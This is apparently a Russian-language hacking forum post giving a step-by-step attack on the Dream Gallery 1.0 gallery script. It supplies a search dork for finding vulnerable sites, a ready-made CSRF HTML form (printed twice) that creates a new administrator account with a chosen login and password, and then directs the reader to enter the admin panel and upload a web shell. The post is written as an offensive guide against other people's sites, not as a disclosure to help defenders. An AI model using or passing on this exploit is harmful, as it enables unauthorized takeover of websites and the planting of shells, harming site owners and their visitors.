Dream Gallery баг

В скрипте Dream Gallery 1.0 найдено уязвимость CSRF - Add Admin
Т.е можно в админке создать нового админа
Дорк: "Design by Rafael Clares"
В найденных сайта ищем админку.
site.ru/admin
Как только найдем сайта с админкой можно приступить к взлому
Открываем блокнот и пишем такой код

<html>
<bOdy>
<form method="post" action="http://site.ru/admin/usuario.php?action=incluir">
<input type="hidden" name="user_login" value="darkknight">
<input type="hidden" name="user_password" type="hidden" value="parol" >
<input type="hidden" name="user_email" value="">
<input type="submit" value="hack">
</form>
</bOdy>
</html>

Код

<html>

<bOdy>

   <form method="post" action="http://site.ru/admin/usuario.php?action=incluir">

      <input type="hidden" name="user_login" value="darkknight">

      <input type="hidden" name="user_password" type="hidden" value="parol" >

      <input type="hidden" name="user_email" value="">

      <input type="submit" value="hack">

</form>

</bOdy>

</html>

тут darkknight будет логин админа
parol - пароль админа
site.ru - тут меняем только домен у которого мы нашли админку
сохраняем как html и запускаем в браузере
После того как нажимаем кнопку hack мы попадаем в админку сайта
там будет надпись Hey Dude!
После этого можно спокойно зайти в раздел albums и загрузить туда шелл